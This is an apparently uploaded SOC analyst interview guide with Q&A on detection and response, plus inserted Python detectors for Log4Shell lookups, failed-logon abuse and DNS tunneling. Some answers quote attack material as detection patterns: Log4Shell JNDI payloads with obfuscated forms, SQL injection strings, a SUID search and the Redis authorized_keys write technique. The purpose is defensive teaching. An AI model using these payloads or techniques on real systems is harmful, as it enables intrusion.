Soc interview questions

The document provides a comprehensive set of interview questions and answers for Security Operations Center (SOC) Analysts, covering topics such as SOC functions, team structure, tools, and various cybersecurity concepts. Key areas include threat detection, incident response, and the use of SIEM tools, along with explanations of specific attacks and mitigation strategies. It also discusses frameworks like MITRE ATT&CK and concepts such as Zero Trust Security and Advanced Persistent Threats (APTs).

Uploaded by mivexi9255

Security Operations Center (SOC) Analyst interview questions along with their answers:


1. What is a SOC, and what are its primary functions?

Answer:
A Security Operations Center (SOC) is a centralized unit that monitors, detects, analyzes,
and responds to cybersecurity incidents in real time. Its primary functions include:

Continuous Monitoring (24/7 security monitoring)
Threat Detection & Analysis
Incident Response (containment, eradication, and recovery)
Vulnerability Management
Threat Intelligence & Hunting
Compliance & Reporting

2. What are the different levels in a SOC team?

Answer:
SOC teams are typically structured into three levels:

L1 (Tier 1) - Security Analyst: Monitors alerts, performs initial analysis, and escalates
incidents.
L2 (Tier 2) - Incident Responder: Investigates security incidents, identifies threats, and
contains attacks.
L3 (Tier 3) - Threat Hunter/Forensic Analyst: Conducts deep threat analysis, digital
forensics, and proactive threat hunting.

3. What are SIEM tools, and how do they work?

Answer:
Security Information and Event Management (SIEM) tools collect, analyze, and correlate
security event logs from different sources to detect threats. Popular SIEM tools include:

Splunk
IBM QRadar
ELK Stack
ArcSight
Microsoft Sentinel

SIEM tools work by:

1. Collecting Logs from firewalls, IDS/IPS, servers, endpoints, and applications.
2. Correlating Data to identify potential threats.
3. Generating Alerts for suspicious activities.
4. Providing Incident Investigation tools and dashboards.

4. What is the difference between IDS and IPS?

Answer:

Feature       | IDS (Intrusion Detection System)        | IPS (Intrusion Prevention System)
Function      | Monitors network traffic for threats    | Monitors and actively blocks threats
Action        | Alerts SOC team                         | Blocks malicious traffic automatically
Placement     | Passive; placed inside the network      | Active; placed in-line with network traffic
Example Tools | Snort, Suricata, Zeek                   | Cisco Firepower, Palo Alto IPS, Suricata (inline IPS mode)

5. What is a false positive and false negative in cybersecurity?

Answer:

False Positive: A security alert that is triggered but is not an actual threat.
False Negative: A real threat that goes undetected.

For example:

If a SIEM flags normal user activity as an attack, it’s a false positive.
If a malware attack bypasses the security system without detection, it’s a false negative.

6. How would you respond to a phishing attack in a SOC?

Answer:

1. Identify the phishing email – Analyze the email headers, links, and attachments.
2. Isolate affected systems – If a user clicks a malicious link, disconnect the system.
3. Check logs in SIEM – Look for IOCs (Indicators of Compromise) related to phishing.
4. Block malicious domains/IPs – Add to firewall/IDS/IPS rules.
5. Educate the user – Provide security awareness training.
6. Report and Document – Maintain an incident response report for further analysis.

7. What are Indicators of Compromise (IoCs)?

Answer:
IoCs are forensic clues that indicate a security breach or malicious activity. Examples
include:

Malicious IP addresses
Suspicious domain names (e.g., phishing URLs)
File hashes of known malicious files (MD5, SHA-256)
Anomalous user behavior (e.g., bursts of failed login attempts)
Presence of malware signatures

8. What is Threat Intelligence, and why is it important?

Answer:
Threat Intelligence involves collecting, analyzing, and sharing information about cyber
threats to enhance security defenses. It helps in:

Identifying new attack vectors
Preventing future attacks
Improving incident response
Reducing false positives in SIEM

Sources of threat intelligence include:

Open Threat Feeds (AlienVault OTX, VirusTotal, AbuseIPDB)
Paid Threat Intelligence Services (IBM X-Force, FireEye, Recorded Future)

9. What steps would you take if a system is infected with malware?

Answer:

1. Isolate the infected system to prevent spread.
2. Analyze logs and malware samples using tools like Wireshark, Procmon, or VirusTotal.
3. Identify the attack vector (email, download, exploit, etc.).
4. Remove the malware using endpoint security tools (Windows Defender, Malwarebytes).
5. Patch vulnerabilities (OS updates, security patches).
6. Monitor network traffic for further threats.
7. Perform a forensic investigation to prevent future incidents.

10. What tools do SOC Analysts commonly use?

Answer:
SOC Analysts use various tools for monitoring, detection, and response:

SIEM Tools: Splunk, QRadar, ArcSight
Network Monitoring: Wireshark, Zeek
Endpoint Security: CrowdStrike, Carbon Black
Threat Intelligence: AlienVault OTX, VirusTotal
Forensics & Analysis: Autopsy, Volatility
Log Analysis: Graylog, LogRhythm

11. How do you analyze suspicious network traffic?

Answer:

1. Capture network packets using Wireshark or Zeek.
2. Analyze abnormal patterns (e.g., unusual ports, excessive connections).
3. Check IP reputation using threat intelligence platforms.
4. Look for beaconing behavior (regular, fixed-interval connections with small payloads) and for encrypted or obfuscated traffic on unexpected ports.
5. Correlate with SIEM alerts to check for known attack signatures.

12. What are some common cyber attack techniques?

Answer:

Phishing – Tricking users into revealing credentials.
Brute Force Attack – Trying multiple passwords to gain access.
SQL Injection – Injecting SQL through unsanitized web application input to read or modify the database.
DDoS Attack – Overloading a system with malicious traffic.
Privilege Escalation – Gaining higher access rights.
MITM (Man-in-the-Middle) – Intercepting communications.
Ransomware – Encrypting files and demanding ransom.

13. How do you handle an insider threat?

Answer:

1. Monitor user activities for unusual behavior (e.g., unauthorized access).
2. Use DLP (Data Loss Prevention) tools to prevent data leaks.
3. Implement least privilege access controls (Zero Trust Model).
4. Conduct regular security awareness training.
5. Audit logs and analyze anomalies in SIEM.

14. What is the MITRE ATT&CK Framework?

Answer:
The MITRE ATT&CK Framework is a knowledge base of tactics, techniques, and procedures
(TTPs) used by adversaries. It helps SOC teams in:

Threat detection and analysis
Incident response planning
Red and blue team operations

Example Tactics:

Initial Access (Phishing, Exploits)
Execution (Malicious Scripts, PowerShell)
Persistence (Backdoors, Scheduled Tasks)

15. What is Zero Trust Security?

Answer:
Zero Trust Security is a model that assumes no entity (internal or external) can be trusted
by default. It requires:

Multi-factor authentication (MFA)
Least privilege access
Continuous monitoring
Network segmentation

16. What is a Security Orchestration, Automation, and Response (SOAR) tool?

Answer:
A SOAR tool is used to automate security operations by integrating with SIEM, firewalls, and
threat intelligence platforms. It helps in:

Automating repetitive tasks (e.g., blocking malicious IPs).
Reducing response time for security incidents.
Providing playbooks for incident response.

Examples: Splunk Phantom, Palo Alto Cortex XSOAR, IBM Resilient.

17. What is an Advanced Persistent Threat (APT)?

Answer:
An APT is a long-term, stealthy attack by a well-funded adversary (often state-sponsored).
Characteristics include:

Persistent access to networks.
Multiple attack vectors (e.g., phishing, zero-day exploits).
Data exfiltration over time.

Example APT Groups: APT29 (Russia), APT41 (China), Lazarus Group (North Korea).

18. How would you detect and mitigate a DNS tunneling attack?

Answer:
Detection:

Monitor unusual DNS queries (e.g., long or high-entropy subdomains, frequent TXT/NULL queries, many unique names under one domain).
Use DNS filtering tools (e.g., OpenDNS, Palo Alto DNS Security).
Analyze SIEM logs for excessive outbound DNS traffic from a single host.

Mitigation:
Block suspicious domains.
Use firewalls to inspect DNS traffic.
Force all clients through internal resolvers and block direct outbound port 53 to anything else.

19. What is the difference between Tactics, Techniques, and Procedures (TTPs)?

Answer:

Tactics: The high-level goals of an attacker (e.g., persistence, privilege escalation).
Techniques: The methods used to achieve those goals (e.g., credential dumping, phishing).
Procedures: The exact steps used by a specific threat actor (e.g., using Mimikatz for credential theft).

This structure is used in frameworks like MITRE ATT&CK.

20. How do you investigate a brute-force attack?

Answer:

1. Check failed login attempts in SIEM logs.
2. Identify source IPs – Are they from known malicious addresses?
3. Look for automation patterns – High request rates indicate bots.
4. Monitor account lockouts – Too many may indicate an attack.
5. Mitigate:
Implement rate limiting & account lockout policies.
Use multi-factor authentication (MFA).
Block malicious IPs on firewalls.

21. How do you perform log analysis in a SOC?

Answer:

1. Collect logs from multiple sources (firewalls, endpoints, SIEM).
2. Normalize and correlate logs using SIEM tools.
3. Look for anomalies like repeated failed logins, unusual traffic spikes.
4. Investigate flagged events – Use threat intelligence feeds.
5. Generate incident reports and take action accordingly.

Tools: Splunk, Graylog, LogRhythm.

22. What are Honeytokens, and how are they used in security?

Answer:
Honeytokens are fake credentials, API keys, or database entries placed in a system to
detect unauthorized access. If they are used, it indicates a breach.

Examples:
Fake admin credentials in Active Directory.
Dummy AWS access keys to detect attackers scanning for cloud resources.

23. What is a Web Application Firewall (WAF), and how does it work?

Answer:
A WAF protects web applications from threats like:

SQL Injection
Cross-Site Scripting (XSS)
DDoS attacks

How it works:

Inspects HTTP requests.
Blocks or allows traffic based on predefined rules.

Examples: Cloudflare WAF, AWS WAF, ModSecurity.

24. How do you differentiate between symmetric and asymmetric encryption?

Answer:

Feature            | Symmetric Encryption             | Asymmetric Encryption
Keys Used          | Single shared secret key         | Public & private key pair
Speed              | Faster                           | Slower
Example Algorithms | AES, ChaCha20 (DES is obsolete)  | RSA, ECC
Usage              | Bulk data encryption             | Key exchange, digital signatures, SSL/TLS handshakes

25. What is a Pass-the-Hash (PtH) attack?

Answer:
A Pass-the-Hash (PtH) attack occurs when an attacker captures hashed credentials and
reuses them to authenticate without knowing the actual password.

Mitigation:

Enforce MFA and Windows Credential Guard.
Disable NTLM authentication if not needed.
Monitor lateral movement in logs.

26. How do you analyze PowerShell attack logs?

Answer:

1. Enable PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and Module Logging (Event ID 4103); with Sysmon, Event ID 1 adds the parent process and the full command line.
2. Check for obfuscated commands (e.g., -EncodedCommand with base64-encoded scripts, string concatenation, -w hidden -nop -ep bypass).
3. Analyze script execution patterns (e.g., downloading external files with Invoke-WebRequest or DownloadString, Invoke-Expression on decoded content).
4. Use YARA or Sigma rules to detect malicious PowerShell usage.

Tool: Sysmon, Windows Event Viewer, Splunk.

27. How would you detect data exfiltration?

Answer:

Monitor outbound network traffic – Large data transfers may indicate leaks.
Use DLP solutions (Data Loss Prevention) to block sensitive file movements.
Check endpoint logs for USB file transfers.
Identify unauthorized cloud uploads (Dropbox, Google Drive).

28. What is a Golden Ticket attack?

Answer:
A Golden Ticket attack is a Kerberos authentication exploit where an attacker creates a
forged ticket to gain persistent domain access.

Mitigation:

Monitor Event ID 4768 (TGT requests) and 4769 (TGS requests) on every DC: a forged TGT is never issued by a DC, so TGS requests (4769) or logons (4624) for an account with no matching 4768 anywhere are suspicious, as are tickets with non-default lifetimes or for accounts that do not exist.
Rotate the KRBTGT account password periodically, and twice in succession after a suspected compromise (the previous key stays valid for one rotation).
Implement privileged access management (PAM) and tiered administration so the krbtgt hash cannot be obtained in the first place.

29. What is a Living-off-the-Land (LotL) attack?

Answer:
LotL attacks use legitimate system tools (e.g., PowerShell, WMI, PsExec) to evade detection.

Examples:

Using PowerShell scripts for malware execution.
Exploiting MSBuild.exe to run malicious code.

Mitigation:

Restrict admin tool usage.
Monitor script execution logs.

30. What is Fileless Malware?

Answer:
Fileless Malware runs in memory instead of being written to disk, making it hard to detect.

Detection:

Monitor script execution in logs.
Use EDR tools (CrowdStrike, SentinelOne).

Examples:

PowerShell-based attacks.
Exploiting Windows registry for persistence.

31. How do you analyze a ransomware attack?

Answer:

1. Identify affected systems and isolate them.
2. Check for ransom notes (common filenames: README.txt).
3. Analyze encryption patterns and detect malware signatures.
4. Restore from backups if available.
5. Block IOCs (IPs, domains, hashes) in security tools.

Common Ransomware Families: WannaCry, Ryuk, LockBit.

32. How do you prevent insider threats?

Answer:

Implement User Behavior Analytics (UBA) to detect anomalies.
Use role-based access control (RBAC).
Enforce strict data access policies.
Conduct regular security awareness training.

33. How does an attacker perform privilege escalation?

Answer:

Exploiting misconfigured permissions (e.g., weak sudo rules in Linux).
Credential dumping (Mimikatz for Windows).
Abusing SUID binaries in Linux (find / -perm -4000).
DLL hijacking in Windows.

34. How do you investigate an SSH brute-force attack?

Answer:

Analyze the SSH authentication log for failed logins (/var/log/auth.log on Debian/Ubuntu, /var/log/secure on RHEL, or journalctl -u ssh).
Identify brute-force IPs and block them in iptables/nftables or with fail2ban.
Enforce key-based authentication (PasswordAuthentication no).
Limit attempts per connection (MaxAuthTries in sshd_config) and rate-limit new connections at the firewall.

35. What is the difference between EDR, XDR, and MDR?

Answer:

EDR (Endpoint Detection & Response) → Focuses on endpoint threats. (e.g., CrowdStrike,
SentinelOne)
XDR (Extended Detection & Response) → Expands EDR to network, cloud, and email
security. (e.g., Palo Alto Cortex XDR)
MDR (Managed Detection & Response) → Outsourced SOC service that monitors security
24/7.

36. How do you detect and prevent Log4j (Log4Shell) exploitation?

Answer:

Detection:
Use SIEM to monitor logs for ${jndi:ldap://malicious.com}-style patterns, including the obfuscated forms attackers use to dodge simple string matches, such as ${${lower:j}ndi:...} and ${${env:NaN:-j}ndi:...}.
Inspect web server logs for unusual JNDI requests in any header (User-Agent, X-Forwarded-For, X-Api-Version) and for outbound LDAP/RMI connections from Java services.
Prevention:
Patch Log4j to 2.17.1+ (2.15.0 and 2.16.0 were incomplete fixes); the log4j-core version can be read from the JAR manifest.
Use WAF rules to block suspicious requests, understanding that they are a stopgap that obfuscation can bypass.
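The de-obfuscation step in the detection above is where naive SIEM rules fail: a regex for the literal string ${jndi: misses ${${lower:j}ndi:...}. The following Python is an added example, not part of the original document, showing how to normalize the lookup nesting that Log4j 2.x evaluates from the inside out (${lower:x}, ${upper:x}, and ${prefix:name:-default} fallbacks) before matching. The sample requests are constructed; the IP address and hostnames are placeholders.

```python
import re

# Constructed sample requests (not real traffic). The first three carry
# Log4Shell-style lookups, the last two are benign.
SAMPLE_REQUESTS = [
    'GET / HTTP/1.1 User-Agent: ${jndi:ldap://203.0.113.5:1389/a}',
    'GET / HTTP/1.1 X-Api-Version: ${${lower:j}ndi:${lower:l}dap://203.0.113.5/x}',
    'GET / HTTP/1.1 User-Agent: ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.5/y}',
    'GET /search?q=price HTTP/1.1 User-Agent: Mozilla/5.0',
    'GET / HTTP/1.1 User-Agent: ${hostName}',
]

# Innermost lookup forms that Log4j evaluates before the outer ${jndi:...}:
# ${lower:x} / ${upper:x} change case, and any ${prefix:name:-default} falls
# back to "default" when the prefix lookup (env, sys, date, ::, ...) fails.
_LOWER = re.compile(r'\$\{lower:([^${}]*)\}', re.I)
_UPPER = re.compile(r'\$\{upper:([^${}]*)\}', re.I)
_DEFAULT = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:', re.I)


def normalize_lookups(value: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes.

    max_rounds bounds the work so a pathological request cannot stall the pipeline.
    """
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), value)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def classify(request: str) -> dict:
    """Return the normalized request plus whether it contains a JNDI lookup."""
    norm = normalize_lookups(request)
    m = _JNDI.search(norm)
    return {
        'jndi': m is not None,
        'scheme': m.group(1).lower() if m else None,
        # obfuscated: only visible after normalization, so a plain-string WAF rule misses it
        'obfuscated': m is not None and '${jndi' not in request.lower(),
        'normalized': norm,
    }


def scan(requests):
    """Return the requests that carry a JNDI lookup after de-obfuscation."""
    return [r for r in requests if classify(r)['jndi']]


if __name__ == '__main__':
    for r in SAMPLE_REQUESTS:
        print(classify(r))
```

Run it over the request or header field of your web logs rather than whole lines; the scheme in the result tells you which outbound protocol (LDAP, RMI, DNS) to hunt for in the firewall logs of the Java host.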

37. How do you analyze an LLMNR/NBT-NS poisoning attack?

Answer:

Look for unexpected name resolution responses: LLMNR (UDP 5355) and NBT-NS (UDP 137) replies for names that do not exist, or many different names all resolving to the same host.
Check whether Responder was used: it answers every query, so a honeypot query for a nonexistent hostname that receives an answer gives it away.
Mitigation:
Disable LLMNR and NBT-NS via Group Policy.
Enforce SMB signing so captured authentication cannot be relayed (captured NetNTLMv2 hashes can still be cracked offline, so strong passwords matter too).

38. What are the differences between IPS and IDS?

Answer:

Feature   | IDS (Intrusion Detection System)     | IPS (Intrusion Prevention System)
Function  | Detects threats                      | Detects & blocks threats
Placement | Monitors network traffic out of band | Inline, actively blocks attacks
Action    | Alerts SOC team                      | Automatically takes action
Examples  | Snort, Suricata                      | Palo Alto, Cisco Firepower

39. How do you handle an alert for a potential zero-day attack?

Answer:

1. Validate the alert – Check logs and behavior analysis.
2. Identify affected systems – Isolate them if necessary.
3. Search threat intelligence feeds for IOCs.
4. Apply compensating controls (e.g., firewall rules, endpoint blocking).
5. Report to the vendor for a patch.

40. What is a DCSync attack?

Answer:
A DCSync attack allows attackers to impersonate a Domain Controller and request
credentials from Active Directory.

Detection:

Monitor for Event ID 4662 (Directory Service Access) whose Properties field contains the replication control-access rights DS-Replication-Get-Changes ({1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}) and DS-Replication-Get-Changes-All ({1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}), raised by any account that is not a domain controller computer account or a known sync service (e.g., Entra/Azure AD Connect).
Look for unusual access to DC accounts, and correlate the 4662 with the 4624 logon that shares its Logon ID to recover the source host.

Prevention:

Restrict replication privileges (the rights above on the domain object) to DCs and approved sync accounts only.
Use tiered admin accounts so domain-admin credentials are never exposed on workstations or member servers, and LAPS for local administrator passwords.

41. How do you detect an SQL injection attack?

Answer:

Look for suspicious SQL fragments in web request logs (e.g., ' OR '1'='1, UNION SELECT, SLEEP(, comment sequences such as -- and /*), often URL-encoded.
Check application and database logs for spikes in SQL syntax errors or HTTP 500 responses following such requests; time-based payloads show up as unusually slow responses.
Enable a Web Application Firewall (WAF) as a detective and stopgap control.
Use parameterized queries (prepared statements) so user input is never interpreted as SQL; input validation is a supplement, not a substitute.

42. How do you analyze Windows Event ID 4625?

Answer:
Windows Event ID 4625 logs failed logins.

Check for multiple failed attempts from a single IP → Possible brute force; many accounts with one failure each from the same IP → password spraying.
Look at the Logon Type (e.g., 2 = interactive, 3 = network, 10 = RemoteInteractive/RDP) and the Status/Sub Status codes (0xC000006A = wrong password, 0xC0000064 = user name does not exist, which shows an attacker guessing account names).
Correlate with Event ID 4624 (a success from the same source after the burst) and Event ID 4720 (new account creation).
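The brute-force, RDP and credential-stuffing questions (Q20, Q34, Q59, Q63) all come down to the same sliding-window logic over failed logons. The following Python is an added example, not part of the original document, that runs that logic over constructed 4625/4624 events (the field names mirror TargetUserName, IpAddress and LogonType from Security.evtx; the IPs, account names and thresholds are assumptions to tune to your own baseline). It distinguishes a brute force on one account from password spraying across many, and raises the finding that matters most: a success from a source that was already flagged.

```python
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

LOGON_TYPES = {2: 'Interactive', 3: 'Network', 5: 'Service', 10: 'RemoteInteractive (RDP)'}


def _t(seconds):
    return datetime(2024, 3, 1, 2, 15, 0) + timedelta(seconds=seconds)


# Constructed sample events (not real logs). Fields are the ones an analyst reads
# out of Security.evtx: EventID, TargetUserName, IpAddress, LogonType.
SAMPLE_EVENTS = (
    # 12 failures against one account in 22 s, then a success: brute force that worked
    [{'time': _t(i * 2), 'event_id': 4625, 'user': 'administrator', 'ip': '198.51.100.7', 'logon_type': 3}
     for i in range(12)]
    + [{'time': _t(40), 'event_id': 4624, 'user': 'administrator', 'ip': '198.51.100.7', 'logon_type': 3}]
    # one attempt each against six accounts over RDP: password spraying
    + [{'time': _t(100 + i * 8), 'event_id': 4625, 'user': u, 'ip': '198.51.100.9', 'logon_type': 10}
       for i, u in enumerate(['alice', 'bob', 'carol', 'dave', 'erin', 'frank'])]
    # a user mistyping once at the console: benign noise
    + [{'time': _t(300), 'event_id': 4625, 'user': 'alice', 'ip': '10.0.0.5', 'logon_type': 2},
       {'time': _t(305), 'event_id': 4624, 'user': 'alice', 'ip': '10.0.0.5', 'logon_type': 2}]
)


def detect_logon_abuse(events, window_seconds=60, brute_threshold=10, spray_threshold=5):
    """Sliding-window analysis of 4625/4624 events keyed on source IP.

    brute_force:         >= brute_threshold failures for one account inside the window
    password_spray:      >= spray_threshold distinct accounts failing inside the window
    success_after_burst: a 4624 from an IP already flagged, i.e. the attack may have worked
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> (time, user) of failures still inside the window
    flagged = defaultdict(set)    # ip -> finding types already raised (one alert per type)
    findings = []

    def raise_finding(kind, ip, when, **extra):
        if kind in flagged[ip]:
            return
        flagged[ip].add(kind)
        findings.append({'type': kind, 'ip': ip, 'time': when.isoformat(), **extra})

    for e in sorted(events, key=lambda x: x['time']):
        ip, now = e['ip'], e['time']
        q = recent[ip]
        while q and now - q[0][0] > window:
            q.popleft()
        logon_type = LOGON_TYPES.get(e['logon_type'], e['logon_type'])
        if e['event_id'] == 4625:
            q.append((now, e['user']))
            per_user = Counter(u for _, u in q)
            user, n = per_user.most_common(1)[0]
            if n >= brute_threshold:
                raise_finding('brute_force', ip, now, user=user, failures=n, logon_type=logon_type)
            if len(per_user) >= spray_threshold:
                raise_finding('password_spray', ip, now, users=sorted(per_user), logon_type=logon_type)
        elif e['event_id'] == 4624 and flagged[ip]:
            raise_finding('success_after_burst', ip, now, user=e['user'], logon_type=logon_type)
    return findings


if __name__ == '__main__':
    for f in detect_logon_abuse(SAMPLE_EVENTS):
        print(f)
```

The same function works on SSH auth.log failures once they are mapped to the same dict shape; the window and thresholds are the knobs that decide how many lockout-policy false positives you accept.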

43. What is an ELF binary, and how do you analyze it for malware?

Answer:
An ELF (Executable and Linkable Format) file is a binary used in Linux.

Malware Analysis:

1. Run strings to look for embedded IP addresses, URLs, file paths, and command strings.
2. Use the file command to determine its type (architecture, static vs dynamic linking, stripped or not).
3. Run readelf -h and readelf -S for the headers and sections, then objdump -d to disassemble the code.
4. Check for persistence methods (cron jobs, systemd units, LD_PRELOAD, rootkit modules).

44. How does an attacker exploit a misconfigured S3 bucket?

Answer:

Public-read/write permissions allow data theft or tampering.
Bucket listing exposure reveals files to attackers.
Mitigation:
Use IAM policies and bucket policies for access control, with no "Principal": "*" grants.
Enable S3 Block Public Access at the account and bucket level, and server-side encryption.
Audit with AWS CloudTrail logs (and S3 server access logs).

45. How do you identify a Kerberoasting attack?

Answer:

Look for Event ID 4769 (TGS requests) with Ticket Encryption Type 0x17 (RC4-HMAC), which attackers request because RC4 tickets crack fastest.
Monitor SPN (Service Principal Name) requests for anomalies: one account requesting tickets for many different service accounts in a short time.
Mitigation:
Use strong (25+ character, random) passwords for Kerberos service accounts.
Implement Group Managed Service Accounts (gMSA), whose passwords are long, random and rotated automatically.

46. What is the difference between Malware and a Rootkit?


Feature    | Malware                | Rootkit
Definition | Any malicious software | Malware that hides itself (and other malware) from the OS and security tools
Detection  | Antivirus & EDR        | Very difficult (hides in the kernel)
Example    | Ransomware, spyware    | TDL4, Stuxnet

47. How do you detect a MITM (Man-in-the-Middle) attack?

Answer:

Check ARP table inconsistencies (arp -a), e.g., two IPs sharing one MAC or the gateway's MAC changing.
Use Wireshark to detect abnormal network traffic (duplicate-address ARP replies, unexpected certificates).
Enable HTTPS and TLS encryption to prevent attacks.

48. What is a Golden SAML attack?

Answer:

A Golden SAML attack is an SSO attack where an attacker who has stolen the identity provider's SAML token-signing private key (e.g., from an AD FS server) forges SAML assertions for any user, bypassing the IdP's password and MFA checks entirely.
Mitigation:
Protect and monitor the AD FS / IdP servers like domain controllers, and rotate SAML signing certificates after any suspected compromise.
Use multi-factor authentication (MFA), and alert on SAML logins at the service provider that have no matching authentication event at the IdP.

49. How does a BlueKeep vulnerability work?

Answer:

BlueKeep (CVE-2019-0708) is a pre-authentication RDP vulnerability in older Windows versions (XP through Windows 7 / Server 2008 R2).
It is a use-after-free in the RDP kernel driver (termdd.sys) reachable before any logon, so a successful exploit gives kernel-level remote code execution and is wormable.
Mitigation:
Patch Windows.
Disable RDP if not needed, or at least do not expose it to the internet.
Enable Network Level Authentication (NLA), which requires authentication before the vulnerable code is reached.

50. How do you detect a compromised IoT device in a network?

Answer:

Monitor unusual network traffic from IoT devices.
Use SIEM for anomaly detection.
Check for new unauthorized open ports.
Apply firmware updates to prevent exploits.

51. How do you investigate a BEC (Business Email Compromise) attack?

Answer:

1. Analyze email headers (Received-SPF and DKIM checks).


2. Look for unusual login activity in Microsoft 365 / Google Workspace.
3. Identify fraudulent domain lookalikes (examp1e.com instead of example.com).
4. Reset credentials and enforce MFA.

52. What is a heap spray attack?

Answer:
A heap spray fills large regions of a process's heap with copies of attacker-controlled data (typically a NOP sled followed by shellcode), so that when a separate memory-corruption bug makes the program jump through a corrupted pointer, the destination is likely to land inside the sprayed payload.

Common in browser exploits, where JavaScript can allocate heap memory at will.

Mitigation:
Use DEP (Data Execution Prevention) so sprayed data is not executable.
Implement Address Space Layout Randomization (ASLR) and fix the underlying memory-corruption bug.

53. How does an attacker exploit an open Redis database?

Answer:

An unauthenticated, exposed Redis lets anyone run CONFIG SET dir and CONFIG SET dbfilename followed by SAVE, so the database snapshot is written to a path of the attacker's choosing, such as the ~/.ssh/authorized_keys of the account Redis runs as. If Redis runs as root that is a root backdoor; the same trick writes cron jobs or web shells.
Mitigation:
Bind Redis to localhost only and keep protected mode on.
Require password authentication (requirepass / ACLs) and rename or disable the CONFIG command.
Use firewalls to restrict access, and never run Redis as root.

54. How do you investigate an NTFS alternate data stream (ADS) attack?

Answer:

Use dir /R to list files with hidden ADS streams (PowerShell: Get-Item -Path <file> -Stream *).
Check if malware hides within ADS streams.
Use streams.exe (Sysinternals) to analyze hidden content.

55. What is an Evil Twin attack?

Answer:
An Evil Twin attack creates a fake Wi-Fi hotspot to steal user credentials.

Mitigation:
Use VPNs on public Wi-Fi.
Avoid auto-connecting to open networks.

56. What is a DNS Tunneling attack, and how do you detect it?

Answer:

DNS Tunneling encodes malicious traffic inside DNS queries.

Detection:
Monitor for excessively long DNS queries.
Identify frequent DNS requests to unusual domains.
Use SIEM correlation rules for DNS traffic analysis.
Mitigation:
Block untrusted DNS resolvers.
Implement DNS filtering (Pi-hole, Cisco Umbrella).
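Q18 and Q56 both describe the same signals (long names, randomness, volume, unusual record types) without showing how to score them. The following Python is an added example, not part of the original document, that turns those signals into a per-(client, domain) check over constructed resolver log lines (the hosts, domains and thresholds are assumptions; the tunnel labels are hex digests generated to look random). It also generalizes the text slightly: it scores the uniqueness of subdomains, since a tunnel almost never repeats a name while legitimate clients hit the same few hosts over and over.

```python
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(text: str) -> float:
    """Bits per character; random-looking labels score ~3.5-4, words score ~2-3."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_qname(qname: str):
    """Return (registered domain, subdomain part).

    Simplification: the registered domain is taken as the last two labels. A real
    deployment should use the Public Suffix List so that co.uk-style suffixes work.
    """
    labels = qname.rstrip('.').lower().split('.')
    return '.'.join(labels[-2:]), '.'.join(labels[:-2])


def sample_dns_log():
    """Constructed resolver log lines (not real traffic): "<ts> <client> <qtype> <qname>"."""
    lines = []
    for i in range(30):   # one host pushing data out in 60-char hex labels
        chunk = hashlib.sha256(f'chunk{i}'.encode()).hexdigest()[:60]
        lines.append(f'2024-03-01T02:{i:02d}:00Z 10.0.0.12 TXT {chunk}.tunnel.example')
    for i, host in enumerate(['www', 'mail', 'www', 'cdn', 'www', 'api'] * 3):
        lines.append(f'2024-03-01T02:{i:02d}:30Z 10.0.0.20 A {host}.corp.example')
    return lines


def analyse_dns(lines, min_queries=20, min_entropy=3.2, min_qname_len=30, min_unique_ratio=0.9):
    """Score each (client, registered domain) pair on volume, label length,
    label randomness (entropy) and how rarely a name repeats."""
    stats = defaultdict(lambda: {'n': 0, 'subs': set(), 'entropy': 0.0, 'length': 0, 'qtypes': Counter()})
    for line in lines:
        _ts, client, qtype, qname = line.split()
        domain, sub = split_qname(qname)
        s = stats[(client, domain)]
        s['n'] += 1
        s['subs'].add(sub)
        s['entropy'] += shannon_entropy(sub.replace('.', ''))
        s['length'] += len(qname)
        s['qtypes'][qtype] += 1

    findings = []
    for (client, domain), s in stats.items():
        mean_entropy = s['entropy'] / s['n']
        mean_len = s['length'] / s['n']
        unique_ratio = len(s['subs']) / s['n']
        if (s['n'] >= min_queries and mean_entropy >= min_entropy
                and mean_len >= min_qname_len and unique_ratio >= min_unique_ratio):
            findings.append({
                'client': client, 'domain': domain, 'queries': s['n'],
                'mean_entropy': round(mean_entropy, 2), 'mean_qname_len': round(mean_len, 1),
                'unique_ratio': round(unique_ratio, 2),
                'top_qtype': s['qtypes'].most_common(1)[0][0],
            })
    return findings


if __name__ == '__main__':
    for f in analyse_dns(sample_dns_log()):
        print(f)
```

Run it per hour: a CDN or anti-virus vendor that legitimately uses long, high-entropy names will trip the entropy and length checks, which is why the volume and uniqueness thresholds exist and why the registered domain should be checked against an allowlist before alerting.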

57. What is a Watering Hole attack?

Answer:

Attackers compromise a legitimate website frequently visited by their targets.
They inject malicious scripts to infect users.
Detection:
Monitor for outbound traffic to newly registered domains.
Use sandbox analysis for suspicious JavaScript.
Mitigation:
Enforce browser security updates.
Use web filtering and URL reputation services.

58. What is Process Injection, and how do you detect it?

Answer:

Process injection allows malware to run inside legitimate processes to avoid detection.
Common techniques:
DLL Injection (e.g., using CreateRemoteThread to force the target to load a DLL).
Process Hollowing (starting a legitimate process suspended and overwriting its image in memory).
Detection:
Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess) with write/thread rights on the target, especially when the call trace points at unbacked memory.
Windows Event ID 4688 (Process Creation) to see the parent/child chain the injector came from.
Mitigation:
Use EDR memory scanning and, for credential-bearing processes, LSA protection.

59. How do you analyze an RDP brute force attack?

Answer:

Look for Event ID 4625 (failed logins) with Logon Type 10 (RemoteInteractive) or 3 (NLA) from the same source IP.
Check the workstation name and source address fields for hosts that should never be reaching RDP.
Correlate with Event ID 4776 (NTLM credential validation failures) on the DC.
Mitigation:
Enable Account Lockout Policy.
Implement RDP MFA and Network Level Authentication (NLA), and do not expose RDP to the internet.

60. What is an AS-REP Roasting attack?

Answer:

